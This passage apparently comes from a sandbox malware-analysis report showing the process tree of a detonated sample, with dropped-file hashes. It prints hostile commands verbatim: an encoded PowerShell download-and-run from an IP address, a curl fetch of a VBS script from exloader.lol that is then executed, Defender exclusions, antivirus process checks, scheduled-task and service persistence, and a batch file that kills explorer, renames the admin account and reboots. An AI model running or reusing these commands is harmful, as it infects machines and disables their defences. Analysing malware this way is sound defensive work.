LgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
                                                                                                                          5⤵
                                                                                                                          • Blocklisted process makes network request
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:2184
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
                                                                                                                            6⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            PID:2140
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 300
                                                                                                                        4⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4412
                                                                                                                    • C:\Users\Admin\Desktop\Files\splwow64.exe
                                                                                                                      "C:\Users\Admin\Desktop\Files\splwow64.exe"
                                                                                                                      3⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Drops file in Windows directory
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:4760
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
                                                                                                                        4⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:1988
                                                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                          tasklist
                                                                                                                          5⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1168
                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                          findstr /I "wrsa opssvc"
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3896
                                                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                          tasklist
                                                                                                                          5⤵
                                                                                                                          • Enumerates processes with tasklist
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1952
                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                          findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:3816
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c md 197036
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:2260
                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                          findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1736
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:5084
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\197036\Jurisdiction.pif
                                                                                                                          Jurisdiction.pif T
                                                                                                                          5⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:3240
                                                                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                                                                          choice /d y /t 5
                                                                                                                          5⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:216
                                                                                                                    • C:\Users\Admin\Desktop\Files\penis.exe
                                                                                                                      "C:\Users\Admin\Desktop\Files\penis.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:1304
                                                                                                                    • C:\Users\Admin\Desktop\Files\AI2.exe
                                                                                                                      "C:\Users\Admin\Desktop\Files\AI2.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2012
                                                                                                                    • C:\Users\Admin\Desktop\Files\aaa.exe
                                                                                                                      "C:\Users\Admin\Desktop\Files\aaa.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:4236
                                                                                                                    • C:\Users\Admin\Desktop\Files\3.exe
                                                                                                                      "C:\Users\Admin\Desktop\Files\3.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:1096
                                                                                                                    • C:\Users\Admin\Desktop\Files\msf.exe
                                                                                                                      "C:\Users\Admin\Desktop\Files\msf.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:452
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 452 -s 1184
                                                                                                                        4⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5092
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 452 -s 1204
                                                                                                                        4⤵
                                                                                                                        • Program crash
                                                                                                                        PID:2768
                                                                                                                    • C:\Users\Admin\Desktop\Files\windowshost.exe
                                                                                                                      "C:\Users\Admin\Desktop\Files\windowshost.exe"
                                                                                                                      3⤵
                                                                                                                        PID:5408
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                                                                                                                      2⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:2556
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                                                                                                                        3⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:3188
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & echo URL="C:\Users\Admin\AppData\Local\GreenTech Dynamics\EcoCraft.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url" & exit
                                                                                                                      2⤵
                                                                                                                      • Drops startup file
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:1348
                                                                                                                    • C:\Users\Admin\Desktop\4363463463464363463463463.exe
                                                                                                                      "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
                                                                                                                      2⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:468
                                                                                                                      • C:\Users\Admin\Desktop\Files\crypted.exe
                                                                                                                        "C:\Users\Admin\Desktop\Files\crypted.exe"
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3612
                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:3788
                                                                                                                      • C:\Users\Admin\Desktop\Files\setup8.exe
                                                                                                                        "C:\Users\Admin\Desktop\Files\setup8.exe"
                                                                                                                        3⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Enumerates system info in registry
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:3804
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://exloader.lol/download/conf22.php && cscript conf.vbs
                                                                                                                          4⤵
                                                                                                                            PID:2696
                                                                                                                            • C:\Windows\system32\curl.exe
                                                                                                                              curl -o conf.vbs https://exloader.lol/download/conf22.php
                                                                                                                              5⤵
                                                                                                                                PID:4332
                                                                                                                              • C:\Windows\system32\cscript.exe
                                                                                                                                cscript conf.vbs
                                                                                                                                5⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                PID:1988
                                                                                                                                • C:\Windows\System32\schtasks.exe
                                                                                                                                  "C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
                                                                                                                                  6⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:5136
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  "C:\Windows\System32\sc.exe" create EdgeService displayname= "Microsoft Edge Update Service" binPath= "C:\Windows\System32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Microsoft-Edge.exe"" start= auto type= own
                                                                                                                                  6⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:5248
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  "C:\Windows\System32\sc.exe" failure EdgeService reset= 86400 actions= restart/1000
                                                                                                                                  6⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:5452
                                                                                                                                • C:\Windows\System32\sc.exe
                                                                                                                                  "C:\Windows\System32\sc.exe" description EdgeService "Provides Microsoft Edge updates. If this service is disabled, the application will not update."
                                                                                                                                  6⤵
                                                                                                                                  • Launches sc.exe
                                                                                                                                  PID:5584
                                                                                                                          • C:\Users\Admin\Desktop\Files\random.exe
                                                                                                                            "C:\Users\Admin\Desktop\Files\random.exe"
                                                                                                                            3⤵
                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Identifies Wine through registry keys
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5196
                                                                                                                          • C:\Users\Admin\Desktop\Files\svchost.exe
                                                                                                                            "C:\Users\Admin\Desktop\Files\svchost.exe"
                                                                                                                            3⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Drops startup file
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Adds Run key to start application
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:5440
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\svchost.exe'
                                                                                                                              4⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:6132
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                                                                              4⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:5684
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'
                                                                                                                              4⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:5732
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
                                                                                                                              4⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:5568
                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
                                                                                                                              4⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:5536
                                                                                                                          • C:\Users\Admin\Desktop\Files\87f3f2.exe
                                                                                                                            "C:\Users\Admin\Desktop\Files\87f3f2.exe"
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5816
                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                              4⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:5968
                                                                                                                          • C:\Users\Admin\Desktop\Files\splwow64_1.exe
                                                                                                                            "C:\Users\Admin\Desktop\Files\splwow64_1.exe"
                                                                                                                            3⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Drops file in Windows directory
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:5164
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
                                                                                                                              4⤵
                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                              PID:4292
                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                tasklist
                                                                                                                                5⤵
                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                PID:5244
                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                findstr /I "wrsa opssvc"
                                                                                                                                5⤵
                                                                                                                                  PID:1956
                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                  tasklist
                                                                                                                                  5⤵
                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                  PID:3776
                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                  findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                                                                                                  5⤵
                                                                                                                                    PID:5520
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /c md 607698
                                                                                                                                    5⤵
                                                                                                                                      PID:5352
                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                      findstr /V "MaskBathroomCompositionInjection" Participants
                                                                                                                                      5⤵
                                                                                                                                        PID:3968
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                                                                                                                                        5⤵
                                                                                                                                          PID:6004
                                                                                                                                    • C:\Users\Admin\Desktop\Files\000.exe
                                                                                                                                      "C:\Users\Admin\Desktop\Files\000.exe"
                                                                                                                                      3⤵
                                                                                                                                        PID:5188
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
                                                                                                                                          4⤵
                                                                                                                                            PID:5468
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /f /im explorer.exe
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5864
                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                              taskkill /f /im taskmgr.exe
                                                                                                                                              5⤵
                                                                                                                                              • Kills process with taskkill
                                                                                                                                              PID:5692
                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                              wmic useraccount where name='Admin' set FullName='UR NEXT'
                                                                                                                                              5⤵
                                                                                                                                                PID:5496
                                                                                                                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                wmic useraccount where name='Admin' rename 'UR NEXT'
                                                                                                                                                5⤵
                                                                                                                                                  PID:5680
                                                                                                                                                • C:\Windows\SysWOW64\shutdown.exe
                                                                                                                                                  shutdown /f /r /t 0
                                                                                                                                                  5⤵
                                                                                                                                                    PID:4484
                                                                                                                                              • C:\Users\Admin\Desktop\Files\spectrum.exe
                                                                                                                                                "C:\Users\Admin\Desktop\Files\spectrum.exe"
                                                                                                                                                3⤵
                                                                                                                                                  PID:5520
                                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                    "schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\spectrum.exe" /rl HIGHEST /f
                                                                                                                                                    4⤵
                                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                                    PID:5412
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe"
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3984
                                                                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                        "schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe" /rl HIGHEST /f
                                                                                                                                                        5⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:2612
                                                                                                                                                  • C:\Users\Admin\Desktop\Files\AsyncClient.exe
                                                                                                                                                    "C:\Users\Admin\Desktop\Files\AsyncClient.exe"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5920
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit
                                                                                                                                                        4⤵
                                                                                                                                                          PID:1980
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'
                                                                                                                                                            5⤵
                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                            PID:4052
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp3317.tmp.bat""
                                                                                                                                                          4⤵
                                                                                                                                                            PID:5248
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout 3
                                                                                                                                                              5⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:5064
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\update.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\update.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:5424
                                                                                                                                                          • C:\Users\Admin\Desktop\Files\25072023.exe
                                                                                                                                                            "C:\Users\Admin\Desktop\Files\25072023.exe"
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4088
                                                                                                                                                            • C:\Users\Admin\Desktop\Files\300.exe
                                                                                                                                                              "C:\Users\Admin\Desktop\Files\300.exe"
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3844
                                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5428
                                                                                                                                                              • C:\Users\Admin\Desktop\4363463463464363463463463.exe
                                                                                                                                                                "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
                                                                                                                                                                2⤵
                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:4444
                                                                                                                                                                • C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe
                                                                                                                                                                  "C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:5532
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-CCPRC.tmp\SrbijaSetupHokej.tmp
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-CCPRC.tmp\SrbijaSetupHokej.tmp" /SL5="$30376,3939740,937984,C:\Users\Admin\Desktop\Files\SrbijaSetupHokej.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                    PID:5856
                                                                                                                                                                • C:\Users\Admin\Desktop\Files\3e3ev3.exe
                                                                                                                                                                  "C:\Users\Admin\Desktop\Files\3e3ev3.exe"
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5264
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                              1⤵
                                                                                                                                                                PID:3460
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:1408
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4176
                                                                                                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2480
                                                                                                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:404
                                                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:2936
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2416 -ip 2416
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3528
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Steam.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Steam.exe"
                                                                                                                                                                            1⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:3760
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 452 -ip 452
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4560
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 452 -ip 452
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:1688
                                                                                                                                                                              • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                "LogonUI.exe" /flags:0x4 /state0:0xa3968855 /state1:0x41c64e6d
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1652

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\ProgramData\chrome.dll

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  676KB

                                                                                                                                                                                  MD5

                                                                                                                                                                                  eda18948a989176f4eebb175ce806255

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  ff22a3d5f5fb705137f233c36622c79eab995897

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  81a4f37c5495800b7cc46aea6535d9180dadb5c151db6f1fd1968d1cd8c1eeb4

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  160ed9990c37a4753fc0f5111c94414568654afbedc05308308197df2a99594f2d5d8fe511fd2279543a869ed20248e603d88a0b9b8fb119e8e6131b0c52ff85

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  649B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  727e8c3c1acf25d51f59d7dab78de985

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  9dba530296113ea324b0310a094458589d5d0bd7

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  ddfc10ba001c8dd38241c46fb7420c8020ff0e7f3a82af10d28cfa96ffb5f525

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  b26b04c1c6c3e65d97602fa8750638d42de8f554fbc05443ce08eb2ac95d88060bf2a58f68e1adb5ef07e3bfd6f6fced98bb15fa1fcbf987cf679898b38b92f4

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                  Filesize

                                                                                                                                                                                  384B

                                                                                                                                                                                  MD5

                                                                                                                                                                                  ea5e0e80c454181a4da29ebfd3770b7b

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  365ff2d9fce90865021d3c4fc954c9212093e794

                                                                                                                                                                                  SHA256

